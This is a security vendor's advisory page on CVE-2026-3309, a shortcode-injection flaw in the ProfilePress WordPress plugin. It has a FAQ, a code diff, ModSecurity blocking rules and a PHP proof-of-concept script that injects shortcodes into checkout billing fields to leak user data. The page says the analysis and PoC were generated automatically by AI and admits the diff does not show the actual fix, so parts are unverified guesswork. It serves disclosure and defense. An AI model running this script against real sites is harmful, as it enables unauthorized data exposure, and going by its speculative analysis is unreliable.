What is CVE-2026-3309?

CVE-2026-3309 is a medium-severity vulnerability in the ProfilePress WordPress plugin that allows unauthenticated arbitrary shortcode execution. This occurs through user-supplied billing field values during the checkout process, which are processed without proper sanitization.

How does this vulnerability work?

The vulnerability allows attackers to inject malicious shortcodes into billing fields during checkout. The plugin processes these fields using WordPress’s do_shortcode() function, executing any shortcode provided, which could lead to unauthorized actions or data exposure.

Who is affected by CVE-2026-3309?

Any WordPress site using ProfilePress plugin version 4.16.11 or earlier is affected. Site administrators should check their plugin version and update if necessary to ensure security.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the ProfilePress plugin installed. If it is version 4.16.11 or earlier, your site is at risk. Additionally, review the plugin’s change logs for security updates.

How can I fix CVE-2026-3309?

The vulnerability is fixed in version 4.16.12 of the ProfilePress plugin. Administrators should update to this version or later to mitigate the risk of exploitation.

What does a CVSS score of 6.5 indicate?

A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk and should be addressed promptly to avoid potential exploitation.

What are the potential risks of exploitation?

Successful exploitation can lead to arbitrary shortcode execution, which may allow attackers to disclose sensitive information, escalate privileges, or execute remote code. The impact depends on the shortcodes available in the WordPress environment.

What is the proof of concept for this vulnerability?

The proof of concept involves submitting a crafted checkout request with a malicious shortcode in the billing fields. This demonstrates how an attacker can exploit the vulnerability to execute arbitrary shortcodes on a vulnerable site.

Is there a way to mitigate the risk if I cannot update immediately?

If immediate updating is not possible, consider disabling the checkout functionality of the plugin or restricting access to it until the plugin can be updated. Additionally, monitor your site for unusual activity.

What should I do if I suspect my site has been compromised?

If you suspect that your site has been compromised due to this vulnerability, conduct a thorough security audit, check for unauthorized changes, and restore from a clean backup if necessary. Update the plugin and strengthen your site’s security.

Where can I find more information about this vulnerability?

More information can be found in the official CVE database or security advisories related to the ProfilePress plugin. Additionally, security blogs and forums may provide insights and discussions on this vulnerability.

What is the role of shortcode sanitization in preventing this issue?

Shortcode sanitization is crucial in preventing this type of vulnerability. Properly validating and escaping user input before processing it as a shortcode would mitigate the risk of arbitrary code execution.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-3309: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress <= 4.16.11 – Unauthenticated Arbitrary Shortcode Execution via Checkout Billing Fields (wp-user-avatar)

CVE ID CVE-2026-3309

Plugin wp-user-avatar

Severity Medium (CVSS 6.5)

CWE 94

Vulnerable Version 4.16.11

Patched Version 4.16.12

Disclosed April 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3309:
The ProfilePress WordPress plugin (versions <= 4.16.11) contains an unauthenticated arbitrary shortcode execution vulnerability. This flaw exists in the plugin's checkout billing fields processing logic. Attackers can inject and execute arbitrary WordPress shortcodes by submitting crafted values during the checkout process, bypassing authentication requirements.

Atomic Edge research identifies the root cause as improper handling of user-supplied billing field data. The plugin interpolates these values into shortcode template strings without sanitizing shortcode syntax. The vulnerable code path resides in the checkout processing functions that handle billing information submission. The plugin processes these values through WordPress's do_shortcode() function or equivalent shortcode parsing mechanisms without validating or escaping shortcode delimiters within user input.

Exploitation occurs during the checkout process where unauthenticated users submit billing information. Attackers craft malicious shortcode payloads within billing field parameters (such as billing_first_name, billing_last_name, billing_address_1, etc.). The plugin accepts these values during order creation and processes them as legitimate shortcodes. This allows execution of any registered WordPress shortcode, including those from other plugins that may perform privileged operations.

The provided code diff shows version increment from 4.16.11 to 4.16.12 but does not display the actual security patch for this vulnerability. The diff includes unrelated changes to subscription validation logic in CheckoutController.php, webhook handler improvements, and dependency updates. Atomic Edge analysis indicates the actual fix likely involves adding shortcode syntax sanitization or validation to billing field processing functions before template interpolation occurs.

Successful exploitation enables arbitrary shortcode execution with the privileges of the WordPress environment. This can lead to information disclosure, privilege escalation, or remote code execution depending on available shortcodes. Attackers could execute shortcodes that query database information, modify user roles, or invoke PHP code execution through vulnerable third-party shortcode implementations.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/wp-user-avatar/src/Membership/Controllers/CheckoutController.php
+++ b/wp-user-avatar/src/Membership/Controllers/CheckoutController.php
@@ -300,6 +300,17 @@
                 throw new Exception(json_encode($customer_id->get_error_messages()));
             }

+            $changePlanSub = SubscriptionFactory::fromId($change_plan_sub_id);
+
+            if (
+                $changePlanSub->exists() &&
+                ! empty($customer_id) &&
+                $customer_id !== $changePlanSub->get_customer_id()) {
+                throw new Exception(
+                    esc_html__('You are not allowed to switch from this plan.', 'wp-user-avatar')
+                );
+            }
+
             $order_id = $this->create_order($customer_id, $cart_vars);

             if (is_wp_error($order_id)) {
@@ -331,19 +342,17 @@

             } else {

-                $sub = SubscriptionFactory::fromId($change_plan_sub_id);
-
-                if ($sub->exists() && $sub->get_customer_id() == $customer_id) {
+                if ($changePlanSub->exists() && $changePlanSub->get_customer_id() == $customer_id) {

                     // do not send subscription cancelled email
                     remove_action('ppress_subscription_cancelled', [SubscriptionCancelledNotification::init(), 'dispatch_email'], 10);
                     remove_action('ppress_subscription_expired', [SubscriptionExpiredNotification::init(), 'dispatch_email'], 10);

-                    $sub->cancel(true);
-                    $sub->expire();
+                    $changePlanSub->cancel(true);
+                    $changePlanSub->expire();

-                    SubscriptionFactory::fromId($subscription_id)->update_meta('_upgraded_from_sub_id', $sub->get_id());
-                    $sub->update_meta('_upgraded_to_sub_id', $subscription_id);
+                    SubscriptionFactory::fromId($subscription_id)->update_meta('_upgraded_from_sub_id', $changePlanSub->get_id());
+                    $changePlanSub->update_meta('_upgraded_to_sub_id', $subscription_id);
                 }

                 /** @var CheckoutResponse $process_payment */
--- a/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionAsyncPaymentFailed.php
+++ b/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionAsyncPaymentFailed.php
@@ -13,6 +13,8 @@

         $order = OrderFactory::fromOrderKey($event_data['client_reference_id']);

-        $order->fail_order();
+        if ($order->exists()) {
+            $order->fail_order();
+        }
     }
 }
--- a/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionAsyncPaymentSucceeded.php
+++ b/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionAsyncPaymentSucceeded.php
@@ -51,7 +51,7 @@
             $order->complete_order($transaction_id);
         }

-        if ( ! $subscription->is_active()) {
+        if ( $subscription->exists() && ! $subscription->is_active()) {

             if ($event_data['mode'] == 'subscription') {

--- a/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionCompleted.php
+++ b/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionCompleted.php
@@ -56,7 +56,7 @@
             $order->complete_order($transaction_id);
         }

-        if ( ! $subscription->is_active()) {
+        if ( $subscription->exists() && ! $subscription->is_active()) {

             if ($event_data['mode'] == 'subscription') {

--- a/wp-user-avatar/src/Membership/Services/OrderService.php
+++ b/wp-user-avatar/src/Membership/Services/OrderService.php
@@ -13,7 +13,6 @@
 use ProfilePressCoreMembershipModelsOrderOrderStatus;
 use ProfilePressCoreMembershipModelsOrderOrderType;
 use ProfilePressCoreMembershipModelsPlanPlanFactory;
-use ProfilePressCoreMembershipModelsSubscriptionSubscriptionBillingFrequency;
 use ProfilePressCoreMembershipModelsSubscriptionSubscriptionEntity;
 use ProfilePressCoreMembershipModelsSubscriptionSubscriptionFactory;
 use ProfilePressCoreMembershipModelsSubscriptionSubscriptionStatus;
--- a/wp-user-avatar/third-party/vendor/composer/installed.php
+++ b/wp-user-avatar/third-party/vendor/composer/installed.php
@@ -2,4 +2,4 @@

 namespace ProfilePressVendor;

-return array('root' => array('name' => '__root__', 'pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '6ba07349dfe1b45b60ed3a3b2c1e085e002fd71c', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev' => true), 'versions' => array('__root__' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '6ba07349dfe1b45b60ed3a3b2c1e085e002fd71c', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev_requirement' => false), 'barryvdh/composer-cleanup-plugin' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '80cceff45bfb85a0f49236537b1f1c928a1ee820', 'type' => 'composer-plugin', 'install_path' => __DIR__ . '/../barryvdh/composer-cleanup-plugin', 'aliases' => array(0 => '0.1.x-dev'), 'dev_requirement' => false), 'brick/math' => array('pretty_version' => '0.9.3', 'version' => '0.9.3.0', 'reference' => 'ca57d18f028f84f777b2168cd1911b0dee2343ae', 'type' => 'library', 'install_path' => __DIR__ . '/../brick/math', 'aliases' => array(), 'dev_requirement' => false), 'carbonphp/carbon-doctrine-types' => array('pretty_version' => '2.1.0', 'version' => '2.1.0.0', 'reference' => '99f76ffa36cce3b70a4a6abce41dba15ca2e84cb', 'type' => 'library', 'install_path' => __DIR__ . '/../carbonphp/carbon-doctrine-types', 'aliases' => array(), 'dev_requirement' => false), 'collizo4sky/persist-admin-notices-dismissal' => array('pretty_version' => '1.4.5', 'version' => '1.4.5.0', 'reference' => '163b868c98cf97ea15b4d7e1305e2d52c9242e7e', 'type' => 'library', 'install_path' => __DIR__ . '/../collizo4sky/persist-admin-notices-dismissal', 'aliases' => array(), 'dev_requirement' => false), 'league/csv' => array('pretty_version' => '9.8.0', 'version' => '9.8.0.0', 'reference' => '9d2e0265c5d90f5dd601bc65ff717e05cec19b47', 'type' => 'library', 'install_path' => __DIR__ . '/../league/csv', 'aliases' => array(), 'dev_requirement' => false), 'nesbot/carbon' => array('pretty_version' => '2.73.0', 'version' => '2.73.0.0', 'reference' => '9228ce90e1035ff2f0db84b40ec2e023ed802075', 'type' => 'library', 'install_path' => __DIR__ . '/../nesbot/carbon', 'aliases' => array(), 'dev_requirement' => false), 'pelago/emogrifier' => array('pretty_version' => 'v6.0.0', 'version' => '6.0.0.0', 'reference' => 'aa72d5407efac118f3896bcb995a2cba793df0ae', 'type' => 'library', 'install_path' => __DIR__ . '/../pelago/emogrifier', 'aliases' => array(), 'dev_requirement' => false), 'psr/clock' => array('pretty_version' => '1.0.0', 'version' => '1.0.0.0', 'reference' => 'e41a24703d4560fd0acb709162f73b8adfc3aa0d', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/clock', 'aliases' => array(), 'dev_requirement' => false), 'psr/clock-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '1.0')), 'sabberworm/php-css-parser' => array('pretty_version' => 'v8.9.0', 'version' => '8.9.0.0', 'reference' => 'd8e916507b88e389e26d4ab03c904a082aa66bb9', 'type' => 'library', 'install_path' => __DIR__ . '/../sabberworm/php-css-parser', 'aliases' => array(), 'dev_requirement' => false), 'sniccowp/php-scoper-wordpress-excludes' => array('pretty_version' => '6.9.1', 'version' => '6.9.1.0', 'reference' => '94867711087d0efc3d361dbe068044e0124f4c0b', 'type' => 'library', 'install_path' => __DIR__ . '/../sniccowp/php-scoper-wordpress-excludes', 'aliases' => array(), 'dev_requirement' => true), 'stripe/stripe-php' => array('pretty_version' => 'v16.6.0', 'version' => '16.6.0.0', 'reference' => 'd6de0a536f00b5c5c74f36b8f4d0d93b035499ff', 'type' => 'library', 'install_path' => __DIR__ . '/../stripe/stripe-php', 'aliases' => array(), 'dev_requirement' => false), 'symfony/css-selector' => array('pretty_version' => 'v5.4.45', 'version' => '5.4.45.0', 'reference' => '4f7f3c35fba88146b56d0025d20ace3f3901f097', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/css-selector', 'aliases' => array(), 'dev_requirement' => false), 'symfony/deprecation-contracts' => array('pretty_version' => 'v2.5.4', 'version' => '2.5.4.0', 'reference' => '605389f2a7e5625f273b53960dc46aeaf9c62918', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/deprecation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-mbstring' => array('pretty_version' => 'v1.33.0', 'version' => '1.33.0.0', 'reference' => '6d857f4d76bd4b343eac26d6b539585d2bc56493', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-mbstring', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-php80' => array('pretty_version' => 'v1.33.0', 'version' => '1.33.0.0', 'reference' => '0cc9dd0f17f61d8131e7df6b84bd344899fe2608', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-php80', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation' => array('pretty_version' => 'v5.4.45', 'version' => '5.4.45.0', 'reference' => '98f26acc99341ca4bab345fb14d7b1d7cb825bed', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-contracts' => array('pretty_version' => 'v2.5.4', 'version' => '2.5.4.0', 'reference' => '450d4172653f38818657022252f9d81be89ee9a8', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '2.3'))));
+return array('root' => array('name' => '__root__', 'pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => 'b7828d2e7a83f0aa7b45ec8cae9ae68799626ee7', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev' => true), 'versions' => array('__root__' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => 'b7828d2e7a83f0aa7b45ec8cae9ae68799626ee7', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev_requirement' => false), 'barryvdh/composer-cleanup-plugin' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '80cceff45bfb85a0f49236537b1f1c928a1ee820', 'type' => 'composer-plugin', 'install_path' => __DIR__ . '/../barryvdh/composer-cleanup-plugin', 'aliases' => array(0 => '0.1.x-dev'), 'dev_requirement' => false), 'brick/math' => array('pretty_version' => '0.9.3', 'version' => '0.9.3.0', 'reference' => 'ca57d18f028f84f777b2168cd1911b0dee2343ae', 'type' => 'library', 'install_path' => __DIR__ . '/../brick/math', 'aliases' => array(), 'dev_requirement' => false), 'carbonphp/carbon-doctrine-types' => array('pretty_version' => '2.1.0', 'version' => '2.1.0.0', 'reference' => '99f76ffa36cce3b70a4a6abce41dba15ca2e84cb', 'type' => 'library', 'install_path' => __DIR__ . '/../carbonphp/carbon-doctrine-types', 'aliases' => array(), 'dev_requirement' => false), 'collizo4sky/persist-admin-notices-dismissal' => array('pretty_version' => '1.4.5', 'version' => '1.4.5.0', 'reference' => '163b868c98cf97ea15b4d7e1305e2d52c9242e7e', 'type' => 'library', 'install_path' => __DIR__ . '/../collizo4sky/persist-admin-notices-dismissal', 'aliases' => array(), 'dev_requirement' => false), 'league/csv' => array('pretty_version' => '9.8.0', 'version' => '9.8.0.0', 'reference' => '9d2e0265c5d90f5dd601bc65ff717e05cec19b47', 'type' => 'library', 'install_path' => __DIR__ . '/../league/csv', 'aliases' => array(), 'dev_requirement' => false), 'nesbot/carbon' => array('pretty_version' => '2.73.0', 'version' => '2.73.0.0', 'reference' => '9228ce90e1035ff2f0db84b40ec2e023ed802075', 'type' => 'library', 'install_path' => __DIR__ . '/../nesbot/carbon', 'aliases' => array(), 'dev_requirement' => false), 'pelago/emogrifier' => array('pretty_version' => 'v6.0.0', 'version' => '6.0.0.0', 'reference' => 'aa72d5407efac118f3896bcb995a2cba793df0ae', 'type' => 'library', 'install_path' => __DIR__ . '/../pelago/emogrifier', 'aliases' => array(), 'dev_requirement' => false), 'psr/clock' => array('pretty_version' => '1.0.0', 'version' => '1.0.0.0', 'reference' => 'e41a24703d4560fd0acb709162f73b8adfc3aa0d', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/clock', 'aliases' => array(), 'dev_requirement' => false), 'psr/clock-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '1.0')), 'sabberworm/php-css-parser' => array('pretty_version' => 'v8.9.0', 'version' => '8.9.0.0', 'reference' => 'd8e916507b88e389e26d4ab03c904a082aa66bb9', 'type' => 'library', 'install_path' => __DIR__ . '/../sabberworm/php-css-parser', 'aliases' => array(), 'dev_requirement' => false), 'sniccowp/php-scoper-wordpress-excludes' => array('pretty_version' => '6.9.1', 'version' => '6.9.1.0', 'reference' => '94867711087d0efc3d361dbe068044e0124f4c0b', 'type' => 'library', 'install_path' => __DIR__ . '/../sniccowp/php-scoper-wordpress-excludes', 'aliases' => array(), 'dev_requirement' => true), 'stripe/stripe-php' => array('pretty_version' => 'v16.6.0', 'version' => '16.6.0.0', 'reference' => 'd6de0a536f00b5c5c74f36b8f4d0d93b035499ff', 'type' => 'library', 'install_path' => __DIR__ . '/../stripe/stripe-php', 'aliases' => array(), 'dev_requirement' => false), 'symfony/css-selector' => array('pretty_version' => 'v5.4.45', 'version' => '5.4.45.0', 'reference' => '4f7f3c35fba88146b56d0025d20ace3f3901f097', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/css-selector', 'aliases' => array(), 'dev_requirement' => false), 'symfony/deprecation-contracts' => array('pretty_version' => 'v2.5.4', 'version' => '2.5.4.0', 'reference' => '605389f2a7e5625f273b53960dc46aeaf9c62918', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/deprecation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-mbstring' => array('pretty_version' => 'v1.33.0', 'version' => '1.33.0.0', 'reference' => '6d857f4d76bd4b343eac26d6b539585d2bc56493', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-mbstring', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-php80' => array('pretty_version' => 'v1.33.0', 'version' => '1.33.0.0', 'reference' => '0cc9dd0f17f61d8131e7df6b84bd344899fe2608', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-php80', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation' => array('pretty_version' => 'v5.4.45', 'version' => '5.4.45.0', 'reference' => '98f26acc99341ca4bab345fb14d7b1d7cb825bed', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-contracts' => array('pretty_version' => 'v2.5.4', 'version' => '2.5.4.0', 'reference' => '450d4172653f38818657022252f9d81be89ee9a8', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '2.3'))));
--- a/wp-user-avatar/wp-user-avatar.php
+++ b/wp-user-avatar/wp-user-avatar.php
@@ -3,7 +3,7 @@
  * Plugin Name: ProfilePress
  * Plugin URI: https://profilepress.com
  * Description: The modern WordPress membership and user profile plugin.
- * Version: 4.16.11
+ * Version: 4.16.12
  * Author: ProfilePress Membership Team
  * Author URI: https://profilepress.com
  * Text Domain: wp-user-avatar
@@ -13,7 +13,7 @@
 defined('ABSPATH') or die("No script kiddies please!");

 define('PROFILEPRESS_SYSTEM_FILE_PATH', __FILE__);
-define('PPRESS_VERSION_NUMBER', '4.16.11');
+define('PPRESS_VERSION_NUMBER', '4.16.12');

 if ( ! defined('PPRESS_STRIPE_API_VERSION')) {
     define('PPRESS_STRIPE_API_VERSION', '2024-06-20');

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3309
# Block ProfilePress arbitrary shortcode execution via checkout billing fields
SecRule REQUEST_URI "@endsWith /wp-admin/admin-ajax.php" 
  "id:1003309,phase:2,deny,status:403,chain,msg:'CVE-2026-3309: ProfilePress Arbitrary Shortcode Execution Attempt',severity:'CRITICAL',tag:'CVE-2026-3309',tag:'WordPress',tag:'ProfilePress',tag:'Shortcode-Injection'"
  SecRule ARGS_POST:action "@streq ppress_process_checkout" "chain"
    SecRule ARGS_POST:billing_first_name|ARGS_POST:billing_last_name|ARGS_POST:billing_address_1|ARGS_POST:billing_address_2|ARGS_POST:billing_city|ARGS_POST:billing_state|ARGS_POST:billing_country "@rx \[.*\]" 
      "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',setvar:'tx.profilepress_shortcode_injection_score=+1',capture"

# Additional rule for frontend checkout forms
SecRule REQUEST_URI "@rx /(checkout|membership-checkout|register)/?$" 
  "id:1003310,phase:2,deny,status:403,chain,msg:'CVE-2026-3309: ProfilePress Frontend Shortcode Injection Attempt',severity:'CRITICAL',tag:'CVE-2026-3309',tag:'WordPress',tag:'ProfilePress'"
  SecRule ARGS_POST:ppress-checkout|ARGS_POST:ppress_form_id "!^$" "chain"
    SecRule ARGS_POST:first_name|ARGS_POST:last_name|ARGS_POST:address|ARGS_POST:city "@rx \[.*\]" 
      "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3309 - Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress <= 4.16.11 - Unauthenticated Arbitrary Shortcode Execution via Checkout Billing Fields

<?php
/**
 * ProfilePress <= 4.16.11 Arbitrary Shortcode Execution PoC
 * Target: WordPress site with vulnerable ProfilePress plugin
 * Method: Inject shortcode payload in billing fields during checkout
 */

$target_url = "https://vulnerable-site.com"; // CHANGE THIS

// Shortcode payload - example using a common information disclosure shortcode
// This could be any registered shortcode including custom ones
$shortcode_payload = "[user_data field='email']";

// Prepare checkout request with malicious billing fields
$checkout_data = [
    'action' => 'ppress_process_checkout',
    'ppress_checkout_nonce' => 'dummy_nonce', // Nonce may be bypassed or not required
    'billing_first_name' => $shortcode_payload, // Inject shortcode in billing field
    'billing_last_name' => 'Test',
    'billing_email' => 'attacker@example.com',
    'plan_id' => '1', // Valid plan ID required
    'payment_method' => 'stripe',
    'stripe_payment_method_id' => 'pm_test_123', // Test Stripe payment method
    'coupon_code' => '',
    'trial_period' => '0'
];

// Initialize cURL session
$ch = curl_init();

// Set checkout endpoint - typically processes through admin-ajax.php
$endpoint = $target_url . '/wp-admin/admin-ajax.php';

curl_setopt_array($ch, [
    CURLOPT_URL => $endpoint,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query($checkout_data),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => false,
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/x-www-form-urlencoded',
        'X-Requested-With: XMLHttpRequest'
    ],
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_MAXREDIRS => 5
]);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if (curl_errno($ch)) {
    echo "cURL Error: " . curl_error($ch) . "n";
} else {
    echo "HTTP Status: $http_coden";
    echo "Response: $responsen";
    
    // Check for shortcode execution indicators
    if (strpos($response, '@') !== false || preg_match('/[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+.[a-zA-Z]{2,}/', $response)) {
        echo "[+] Potential shortcode execution detected (email pattern found)n";
    }
    if (strpos($response, 'user_data') !== false || strpos($response, 'shortcode') !== false) {
        echo "[+] Shortcode-related content found in responsen";
    }
}

curl_close($ch);

// Alternative: Direct form submission to checkout page
// Some implementations may process through frontend checkout forms
$frontend_checkout = $target_url . '/checkout/';
$ch2 = curl_init($frontend_checkout);

$form_data = [
    'ppress-checkout' => '1',
    'ppress_form_id' => '1', // Checkout form ID
    'first_name' => $shortcode_payload, // Alternative field name
    'last_name' => 'Test',
    'email' => 'attacker@example.com'
];

curl_setopt_array($ch2, [
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query($form_data),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true
]);

$response2 = curl_exec($ch2);
curl_close($ch2);

// Note: Actual field names may vary based on ProfilePress configuration
// Multiple billing fields should be tested: billing_first_name, billing_last_name, billing_address_1, etc.
?>

Frequently Asked Questions

What is CVE-2026-3309?
Overview of the vulnerability
CVE-2026-3309 is a medium-severity vulnerability in the ProfilePress WordPress plugin that allows unauthenticated arbitrary shortcode execution. This occurs through user-supplied billing field values during the checkout process, which are processed without proper sanitization.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to inject malicious shortcodes into billing fields during checkout. The plugin processes these fields using WordPress’s do_shortcode() function, executing any shortcode provided, which could lead to unauthorized actions or data exposure.
Who is affected by CVE-2026-3309?
Identifying vulnerable installations
Any WordPress site using ProfilePress plugin version 4.16.11 or earlier is affected. Site administrators should check their plugin version and update if necessary to ensure security.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the ProfilePress plugin installed. If it is version 4.16.11 or earlier, your site is at risk. Additionally, review the plugin’s change logs for security updates.
How can I fix CVE-2026-3309?
Recommended actions
The vulnerability is fixed in version 4.16.12 of the ProfilePress plugin. Administrators should update to this version or later to mitigate the risk of exploitation.
What does a CVSS score of 6.5 indicate?
Understanding severity ratings
A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk and should be addressed promptly to avoid potential exploitation.
What are the potential risks of exploitation?
Consequences of an attack
Successful exploitation can lead to arbitrary shortcode execution, which may allow attackers to disclose sensitive information, escalate privileges, or execute remote code. The impact depends on the shortcodes available in the WordPress environment.
What is the proof of concept for this vulnerability?
Demonstration of the issue
The proof of concept involves submitting a crafted checkout request with a malicious shortcode in the billing fields. This demonstrates how an attacker can exploit the vulnerability to execute arbitrary shortcodes on a vulnerable site.
Is there a way to mitigate the risk if I cannot update immediately?
Temporary protective measures
If immediate updating is not possible, consider disabling the checkout functionality of the plugin or restricting access to it until the plugin can be updated. Additionally, monitor your site for unusual activity.
What should I do if I suspect my site has been compromised?
Response to potential exploitation
If you suspect that your site has been compromised due to this vulnerability, conduct a thorough security audit, check for unauthorized changes, and restore from a clean backup if necessary. Update the plugin and strengthen your site’s security.
Where can I find more information about this vulnerability?
Resources for further reading
More information can be found in the official CVE database or security advisories related to the ProfilePress plugin. Additionally, security blogs and forums may provide insights and discussions on this vulnerability.
What is the role of shortcode sanitization in preventing this issue?
Importance of input validation
Shortcode sanitization is crucial in preventing this type of vulnerability. Properly validating and escaping user input before processing it as a shortcode would mitigate the risk of arbitrary code execution.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations